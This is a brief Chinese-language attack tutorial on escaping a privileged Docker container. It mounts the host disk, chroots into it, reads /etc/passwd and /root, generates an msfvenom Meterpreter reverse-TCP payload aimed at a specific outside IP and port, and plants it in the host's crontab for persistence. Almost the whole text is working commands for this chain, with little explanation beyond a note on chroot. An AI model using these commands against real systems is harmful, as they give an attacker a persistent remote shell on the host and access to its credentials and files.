privileged 特权模式启动容器

1、启动特权容器

docker run -it --privileged ubuntu:18.04  

2、挂在宿主机目录

fdisk -l  

可以直接挂载宿主机的磁盘

mkdir uzju mount /dev/sda3 uzju/ chroot /uzju/  

查看宿主机的/etc/passwd

查看root目录

Tips： chroot命令 chroot命令 用来在指定的根目录下运行指令。chroot，即 change root directory （更改 root 目录）。在 linux 系统中，系统默认的目录结构都是以/，即是以根 (root) 开始的。而在使用 chroot 之后，系统的目录结构将以指定的位置作为/位置。 把根目录换成指定的目的目录。

授予木马权限：

chmod +x /uzju/root/shell.elf

MSF 监听上线：

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=3333 -f elf > shell.elf

逃逸：

chmod +x /uzju/root/shell.elf

写入定时任务：

echo '*/1   root /root/shell.elf' >> /uzju/etc/crontab

之后可执行上线